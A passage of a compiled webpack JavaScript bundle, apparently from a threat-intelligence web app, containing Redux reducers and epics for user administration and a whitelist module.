            type: 'error',
            text: Object(__WEBPACK_IMPORTED_MODULE_4_trustar_utils__["parseServerErrorMessage"])(err, 'Error saving email ingest.')
          }
        }
      });
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["combineEpics"])(refetchIngestEmailsEpic, fetchIngestEmailsEpic, deleteIngestEmailEpic, navigateEpic, defaultEnclaveSelectionEpic, saveEmailSettingsEpic));

/***/ }),
/* 3253 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export fromJSON */
/* unused harmony export listToOrderedMap */
/* unused harmony export users */
/* unused harmony export loading */
/* unused harmony export options */
/* unused harmony export autosuggestText */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_fp__ = __webpack_require__(109);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types_js__ = __webpack_require__(517);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__types_js__ = __webpack_require__(413);











// The cases for "userName" and "emailAddress" fields are the
// result of legacy change. HOWEVER, the cases for "roles" and
// "enclaves" are necessary.
var fromJSON = function fromJSON(rawUser) {
  var parsed = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(rawUser);
  var companyEnclaves = parsed.getIn(['company', 'enclaves']);
  var result = parsed.updateIn(['company', 'enclaves'], function (v) {
    return v ? v.toMap().mapKeys(function (k1, v1) {
      return v1.get('id');
    }) : v;
  }).update('enclaves', function (v) {
    if (v) {
      var enclaves = companyEnclaves.map(function (enc) {
        var value = enc.get('id');
        var foundEnclave = v.find(function (e) {
          return e.get('id') === value;
        });
        if (!foundEnclave) {
          return enc.toMap().set('read', false).set('create', false).set('update', false);
        }
        return foundEnclave;
      });
      return enclaves.toMap().mapKeys(function (k1, v1) {
        return v1.get('id');
      });
    }
    return v;
  }).mapKeys(function (k, v) {
    switch (k) {
      case 'userName':
        return 'username';
      case 'emailAddress':
        return 'email';
      default:
        return k;
    }
  });

  return Object(__WEBPACK_IMPORTED_MODULE_6__types_js__["b" /* User */])(result);
};

// TODO: duplicated elsewhere
var listToOrderedMap = function listToOrderedMap(list) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(list).toOrderedMap().mapKeys(function (k, v) {
    return v.get('guid');
  });
};

var users = function users() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* FETCH_USER_SUCCESS */]:
      return state.set(payload.guid, Object(__WEBPACK_IMPORTED_MODULE_6__types_js__["b" /* User */])(Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).toOrderedMap()));
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* FETCH_SUCCESS */]:
      {
        var userMap = listToOrderedMap(payload.map(fromJSON));
        var isFirstPage = action.meta && action.meta.startPage === 0;
        return isFirstPage ? userMap : state.merge(userMap); // Append (merge) if we're paginating
      }
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* DELETE_SUCCESS */]:
      return state.delete(payload);

    default:
      return state;
  }
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["j" /* FETCH */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["s" /* SAVE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["e" /* DELETE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["b" /* DEACTIVATE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["p" /* RESET_PASSWORD */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* FETCH_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["o" /* FETCH_USER_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["n" /* FETCH_USER_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["k" /* FETCH_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["u" /* SAVE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["t" /* SAVE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["g" /* DELETE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["f" /* DELETE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["d" /* DEACTIVATE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["c" /* DEACTIVATE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["r" /* RESET_PASSWORD_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["q" /* RESET_PASSWORD_FAILURE */]:
      return false;
    default:
      return state;
  }
};

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_6__types_js__["a" /* Options */])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["v" /* SET_DISPLAY_OPTIONS */]:
      return state.merge(payload);

    // Set hasNext after a fetch
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["l" /* FETCH_SUCCESS */]:
      return action.meta ? state.set('hasNext', action.meta.hasNext) : state;

    default:
      return state;
  }
};

var autosuggestText = function autosuggestText() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : '';
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["a" /* AUTOSUGGEST */]:
      return payload;
    default:
      return state;
  }
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__["combineReducers"])({
  users: users,
  options: options,
  loading: loading,
  autosuggestText: autosuggestText
}));

/***/ }),
/* 3254 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs__ = __webpack_require__(14);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_rxjs___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_rxjs__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_querystring__ = __webpack_require__(119);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_querystring___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_querystring__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_redux_observable__ = __webpack_require__(15);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_redux_form__ = __webpack_require__(1434);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug__ = __webpack_require__(7);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7_debug___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_7_debug__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__utils_csv__ = __webpack_require__(1330);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_9__action_types_js__ = __webpack_require__(517);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_10__actions_js__ = __webpack_require__(778);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_11__getters_js__ = __webpack_require__(779);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_12__alerts_actions__ = __webpack_require__(76);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_13__types_js__ = __webpack_require__(413);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_14_modules_enclave_utils__ = __webpack_require__(297);












var debug = __WEBPACK_IMPORTED_MODULE_7_debug___default()('app:modules:users:epics'); // eslint-disable-line no-unused-vars










var url = function url(subpath) {
  var base = '/services/users';
  return subpath ? base + '/' + subpath : base;
};

var toJSON = function toJSON(user) {
  if (!(user instanceof __WEBPACK_IMPORTED_MODULE_13__types_js__["b" /* User */]) || !__WEBPACK_IMPORTED_MODULE_5_immutable__["Map"].isMap(user)) {
    debug('toJSON was called on a non-immutable object.');
    user = Object(__WEBPACK_IMPORTED_MODULE_5_immutable__["fromJS"])(user);
  }

  return user.update('email', function (v) {
    return v ? v.trim() : v;
  }).update('username', function (v) {
    return v ? v.trim() : v;
  }).update('enclaves', function (e) {
    return e.toList();
  }).update('company', function (company) {
    return company ? company.delete('enclaves').delete('sector') : null;
  }).update('role', function (role) {
    return role ? { name: role.get('name') } : null;
  }).toJS();
};

var fetchUserEpic = function fetchUserEpic(action$, store, _ref) {
  var ajax = _ref.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["m" /* FETCH_USER */]).mergeMap(function (_ref2) {
    var userId = _ref2.userId;
    return ajax.get(url(userId)).map(function (_ref3) {
      var response = _ref3.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["o" /* FETCH_USER_SUCCESS */],
        payload: response
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["n" /* FETCH_USER_FAILURE */],
        payload: err
      });
    });
  });
};

var fetchEpic = function fetchEpic(action$, store, _ref4) {
  var ajax = _ref4.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["j" /* FETCH */]).map(Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["prop"])('payload')).debounceTime(500).switchMap(function (params) {
    var parameterizedUrl = url() + '?' + Object(__WEBPACK_IMPORTED_MODULE_1_querystring__["stringify"])(params);
    return ajax.get(parameterizedUrl).map(function (_ref5) {
      var response = _ref5.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["l" /* FETCH_SUCCESS */],
        payload: response,
        meta: {
          startPage: params.startPage,
          hasNext: response.length == params.pageSize
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["k" /* FETCH_FAILURE */],
        payload: err
      });
    });
  });
};

var saveUserFailure = function saveUserFailure(err, msg) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["t" /* SAVE_FAILURE */],
    error: true,
    payload: err,
    meta: {
      alert: { type: 'error', text: msg ? msg : 'Could not save user.' }
    }
  };
};

/**
 * NOTE: This epic takes care of both save and update, which both have different
 * URLs. The url will be determined by the presence of a GUID on the object to
 * be saved.
 */
var saveEpic = function saveEpic(action$, store, _ref6) {
  var ajax = _ref6.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["s" /* SAVE */]).mergeMap(function (_ref7) {
    var payload = _ref7.payload;

    if (!payload) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(saveUserFailure(new Error('Payload was undefined')));
    }

    var id = payload.get('guid');
    var data = toJSON(payload);

    return ajax.postJSON(url(id), data).map(function (_ref8) {
      var response = _ref8.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["u" /* SAVE_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: 'User saved.' }
        }
      };
    }).catch(function (err) {
      var message = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["path"])(['xhr', 'response', 'message'], err);
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(saveUserFailure(err, message));
    });
  });
};

/**
 * Trigger a re-fetch of users with the currently specified options. For
 * example, when a new user is saved rather than tack it on to state we need to
 * refetch. The reason is, all the logic related to sorting and filtering lives
 * on the server side, so we need to the server to provide us with an updated
 * list of users based on our current criteria.
 */
var refetchEpic = function refetchEpic(action$, store) {
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["u" /* SAVE_SUCCESS */], __WEBPACK_IMPORTED_MODULE_9__action_types_js__["d" /* DEACTIVATE_SUCCESS */], __WEBPACK_IMPORTED_MODULE_9__action_types_js__["r" /* RESET_PASSWORD_SUCCESS */]).map(function () {
    return Object(__WEBPACK_IMPORTED_MODULE_11__getters_js__["displayOptions"])(store.getState());
  }).map(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["getQueryParams"]).map(__WEBPACK_IMPORTED_MODULE_10__actions_js__["fetch"]);
};

var deleteEpic = function deleteEpic(action$, store, _ref9) {
  var ajax = _ref9.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["e" /* DELETE */]).mergeMap(function (_ref10) {
    var id = _ref10.payload;
    return ajax.delete(url(id)).map(function () {
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["g" /* DELETE_SUCCESS */],
        payload: id,
        meta: {
          alert: { type: 'success', text: 'User removed.' }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["f" /* DELETE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: { type: 'error', text: 'Could not delete user.' }
        }
      });
    });
  });
};

var deactivateEpic = function deactivateEpic(action$, store, _ref11) {
  var ajax = _ref11.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["b" /* DEACTIVATE */]).mergeMap(function (_ref12) {
    var payload = _ref12.payload;
    var email = payload.email,
        deactivated = payload.deactivated;

    return ajax.postForm(url('deactivate'), payload).map(function (_ref13) {
      var response = _ref13.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["d" /* DEACTIVATE_SUCCESS */],
        payload: response,
        meta: {
          alert: {
            type: 'success',
            text: 'User ' + (response.deactivated ? 'de' : 're') + 'activated.'
          }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["c" /* DEACTIVATE_FAILURE */],
        error: true,
        payload: err,
        meta: {
          alert: {
            type: 'error',
            text: 'Could not ' + (deactivated ? 'de' : 're') + 'activate user.'
          }
        }
      });
    });
  });
};

var resetPasswordFailure = function resetPasswordFailure(err) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["q" /* RESET_PASSWORD_FAILURE */],
    payload: err,
    error: true,
    meta: {
      alert: { type: 'error', text: 'Reset password failed.' }
    }
  };
};

var resetPasswordEpic = function resetPasswordEpic(action$, store, _ref14) {
  var ajax = _ref14.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["p" /* RESET_PASSWORD */]).mergeMap(function (_ref15) {
    var user = _ref15.payload;

    if (!user) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(resetPasswordFailure(new Error('Payload was undefined')));
    }

    var id = user.get('guid');
    var successMessage = user.get('activationDate') ? 'Password reset.' : 'Confirmation sent';

    return ajax.post('/services/password/send-reset/' + id).map(function (_ref16) {
      var response = _ref16.response;
      return {
        type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["r" /* RESET_PASSWORD_SUCCESS */],
        payload: response,
        meta: {
          alert: { type: 'success', text: successMessage }
        }
      };
    }).catch(function (err) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of(resetPasswordFailure(err));
    });
  });
};

var exportAllEpic = function exportAllEpic(action$, store, _ref17) {
  var ajax = _ref17.ajax;
  return action$.ofType(__WEBPACK_IMPORTED_MODULE_9__action_types_js__["h" /* EXPORT_ALL */]).mergeMap(function () {
    return (
      // <-- IMPORTANT. response will be null if the observable doesn't know its responseType text
      ajax.get(url('users.csv'), {}, { responseType: 'text' }).do(function (response) {
        if (response.response != 'email') {
          var sanitizedCsv = Object(__WEBPACK_IMPORTED_MODULE_8__utils_csv__["a" /* sanitizeCsvFields */])(response.response);
          Object(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["saveTextToFile"])('UserDirectory.csv', sanitizedCsv);
        } else {
          store.dispatch(Object(__WEBPACK_IMPORTED_MODULE_12__alerts_actions__["success"])('An e-mail with the user list will be delivered shortly'));
        }
      }).ignoreElements().catch(function (err) {
        return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].of({
          type: __WEBPACK_IMPORTED_MODULE_9__action_types_js__["i" /* EXPORT_ALL_FAILURE */],
          payload: err,
          error: true,
          meta: {
            alert: { type: 'error', text: 'Could not export user directory.' }
          }
        });
      })
    );
  });
};

/* Manually interact with Redux-Form actions and store when the user
 * updates the company selection. We need to populate the enclave form
 * fields based on the selected companies enclave. We also need to
 * update the MFA and SSO fields according to the company selection/deselection.
*/
var selectCompanyUsersFormEpic = function selectCompanyUsersFormEpic(action$, store) {
  return action$.ofType('@@redux-form/CHANGE').filter(function (_ref18) {
    var _ref18$meta = _ref18.meta,
        field = _ref18$meta.field,
        form = _ref18$meta.form;
    return form === 'user' && field === 'company';
  }).mergeMap(function (_ref19) {
    var company = _ref19.payload;
    return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].defer(function () {
      var setCompanyEnclavesAction = Object(__WEBPACK_IMPORTED_MODULE_3_redux_form__["change"])('user', 'enclaves', company ? company.get('enclaves').sort(__WEBPACK_IMPORTED_MODULE_6_trustar_utils__["alphabetize"]).toOrderedMap().map(function (e) {
        return e.set('maximumAccess', Object(__WEBPACK_IMPORTED_MODULE_14_modules_enclave_utils__["c" /* determineAccessType */])(e));
      }).mapKeys(function (k, v) {
        return v.get('id');
      }) : Object(__WEBPACK_IMPORTED_MODULE_5_immutable__["List"])());
      var actions = company ? [Object(__WEBPACK_IMPORTED_MODULE_3_redux_form__["change"])('user', 'ssoEnabled', false), Object(__WEBPACK_IMPORTED_MODULE_3_redux_form__["change"])('user', 'mfaEnabled', false)] : [Object(__WEBPACK_IMPORTED_MODULE_3_redux_form__["unregisterField"])('user', 'ssoEnabled'), Object(__WEBPACK_IMPORTED_MODULE_3_redux_form__["unregisterField"])('user', 'mfaEnabled')];
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].from([setCompanyEnclavesAction].concat(actions));
    }).catch(function (e) {
      return __WEBPACK_IMPORTED_MODULE_0_rxjs__["Observable"].empty();
    });
  });
};

/* harmony default export */ __webpack_exports__["a"] = (Object(__WEBPACK_IMPORTED_MODULE_2_redux_observable__["combineEpics"])(fetchEpic, fetchUserEpic, saveEpic, deleteEpic, deactivateEpic, resetPasswordEpic, exportAllEpic, selectCompanyUsersFormEpic, refetchEpic));

/***/ }),
/* 3255 */,
/* 3256 */,
/* 3257 */,
/* 3258 */,
/* 3259 */,
/* 3260 */,
/* 3261 */,
/* 3262 */,
/* 3263 */,
/* 3264 */,
/* 3265 */,
/* 3266 */,
/* 3267 */,
/* 3268 */,
/* 3269 */,
/* 3270 */,
/* 3271 */,
/* 3272 */,
/* 3273 */,
/* 3274 */,
/* 3275 */,
/* 3276 */,
/* 3277 */,
/* 3278 */,
/* 3279 */,
/* 3280 */,
/* 3281 */,
/* 3282 */,
/* 3283 */,
/* 3284 */,
/* 3285 */,
/* 3286 */,
/* 3287 */,
/* 3288 */,
/* 3289 */,
/* 3290 */,
/* 3291 */,
/* 3292 */,
/* 3293 */,
/* 3294 */,
/* 3295 */,
/* 3296 */,
/* 3297 */,
/* 3298 */,
/* 3299 */,
/* 3300 */,
/* 3301 */,
/* 3302 */,
/* 3303 */,
/* 3304 */,
/* 3305 */,
/* 3306 */,
/* 3307 */,
/* 3308 */,
/* 3309 */,
/* 3310 */,
/* 3311 */,
/* 3312 */,
/* 3313 */,
/* 3314 */,
/* 3315 */,
/* 3316 */,
/* 3317 */,
/* 3318 */,
/* 3319 */,
/* 3320 */,
/* 3321 */,
/* 3322 */,
/* 3323 */,
/* 3324 */,
/* 3325 */,
/* 3326 */,
/* 3327 */,
/* 3328 */,
/* 3329 */,
/* 3330 */,
/* 3331 */,
/* 3332 */,
/* 3333 */,
/* 3334 */,
/* 3335 */,
/* 3336 */,
/* 3337 */,
/* 3338 */,
/* 3339 */,
/* 3340 */,
/* 3341 */,
/* 3342 */,
/* 3343 */,
/* 3344 */,
/* 3345 */,
/* 3346 */,
/* 3347 */,
/* 3348 */,
/* 3349 */,
/* 3350 */,
/* 3351 */,
/* 3352 */,
/* 3353 */,
/* 3354 */,
/* 3355 */,
/* 3356 */,
/* 3357 */,
/* 3358 */,
/* 3359 */,
/* 3360 */,
/* 3361 */,
/* 3362 */,
/* 3363 */,
/* 3364 */,
/* 3365 */,
/* 3366 */,
/* 3367 */,
/* 3368 */,
/* 3369 */,
/* 3370 */,
/* 3371 */,
/* 3372 */,
/* 3373 */,
/* 3374 */,
/* 3375 */,
/* 3376 */,
/* 3377 */,
/* 3378 */,
/* 3379 */,
/* 3380 */,
/* 3381 */,
/* 3382 */,
/* 3383 */,
/* 3384 */,
/* 3385 */,
/* 3386 */,
/* 3387 */,
/* 3388 */,
/* 3389 */,
/* 3390 */,
/* 3391 */,
/* 3392 */,
/* 3393 */,
/* 3394 */,
/* 3395 */,
/* 3396 */,
/* 3397 */,
/* 3398 */,
/* 3399 */,
/* 3400 */,
/* 3401 */,
/* 3402 */,
/* 3403 */,
/* 3404 */,
/* 3405 */,
/* 3406 */,
/* 3407 */,
/* 3408 */,
/* 3409 */,
/* 3410 */,
/* 3411 */,
/* 3412 */,
/* 3413 */,
/* 3414 */,
/* 3415 */,
/* 3416 */,
/* 3417 */,
/* 3418 */,
/* 3419 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "fetchGlobalWhitelist", function() { return fetchGlobalWhitelist; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveWhitelistEntry", function() { return saveWhitelistEntry; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "saveWhitelistEntries", function() { return saveWhitelistEntries; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "deleteWhitelistEntry", function() { return deleteWhitelistEntry; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "clearWhitelist", function() { return clearWhitelist; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "updateFilters", function() { return updateFilters; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "resetFilters", function() { return resetFilters; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__action_types_js__ = __webpack_require__(796);




/* Fetches all whitelist entries */
var fetchGlobalWhitelist = function fetchGlobalWhitelist() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["g" /* FETCH_WHITELIST_PAGE */] };
};

/* Handles save new entry and edit entry*/
var saveWhitelistEntry = function saveWhitelistEntry(whitelistEntry) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["n" /* SAVE_WHITELIST_ENTRY */],
    payload: whitelistEntry
  };
};

var saveWhitelistEntries = function saveWhitelistEntries(texts) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["k" /* SAVE_WHITELIST_ENTRIES */],
    payload: texts
  };
};

/* Delete by guid */
var deleteWhitelistEntry = function deleteWhitelistEntry(whitelistEntry) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["d" /* DELETE_WHITELIST_ENTRY */],
    payload: whitelistEntry
  };
};

var clearWhitelist = function clearWhitelist() {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["a" /* CLEAR_WHITELIST */]
  };
};

var updateFilters = function updateFilters(payload, field) {
  return {
    type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["q" /* UPDATE_PAGE_FILTERS */],
    payload: payload,
    field: field
  };
};

var resetFilters = function resetFilters() {
  return { type: __WEBPACK_IMPORTED_MODULE_1__action_types_js__["j" /* RESET_PAGE_FILTERS */] };
};

/***/ }),
/* 3420 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export entries */
/* unused harmony export modalOpen */
/* unused harmony export loading */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__getters__ = __webpack_require__(797);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__action_types_js__ = __webpack_require__(796);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__types__ = __webpack_require__(798);








var entries = function entries() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_WHITELIST_PAGE_SUCCESS */]:
      var items = Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload.get('items')).toOrderedMap().mapKeys(function (k, v) {
        return v.get('guid');
      });
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["fromJS"])(payload).set('items', items);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["p" /* SAVE_WHITELIST_ENTRY_SUCCESS */]:
      return state.setIn(['items', payload.get('guid')], payload);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* DELETE_WHITELIST_ENTRY_SUCCESS */]:
      return state.deleteIn(['items', payload.get('guid')]);
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* CLEAR_WHITELIST_SUCCESS */]:
      return Object(__WEBPACK_IMPORTED_MODULE_1_immutable__["OrderedMap"])();
    default:
      return state;
  }
};

var modalOpen = function modalOpen() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  return state;
};

var loading = function loading() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];

  switch (action.type) {
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["g" /* FETCH_WHITELIST_PAGE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["n" /* SAVE_WHITELIST_ENTRY */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["d" /* DELETE_WHITELIST_ENTRY */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["a" /* CLEAR_WHITELIST */]:
      return true;
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["i" /* FETCH_WHITELIST_PAGE_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["h" /* FETCH_WHITELIST_PAGE_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["p" /* SAVE_WHITELIST_ENTRY_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["o" /* SAVE_WHITELIST_ENTRY_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["m" /* SAVE_WHITELIST_ENTRIES_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["l" /* SAVE_WHITELIST_ENTRIES_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["f" /* DELETE_WHITELIST_ENTRY_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["e" /* DELETE_WHITELIST_ENTRY_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["c" /* CLEAR_WHITELIST_SUCCESS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["b" /* CLEAR_WHITELIST_FAILURE */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["q" /* UPDATE_PAGE_FILTERS */]:
    case __WEBPACK_IMPORTED_MODULE_3__action_types_js__["j" /* RESET_PAGE_FILTERS */]:
      return false;
    default:
      return state;
  }
};

var currentQuery = function currentQuery() {
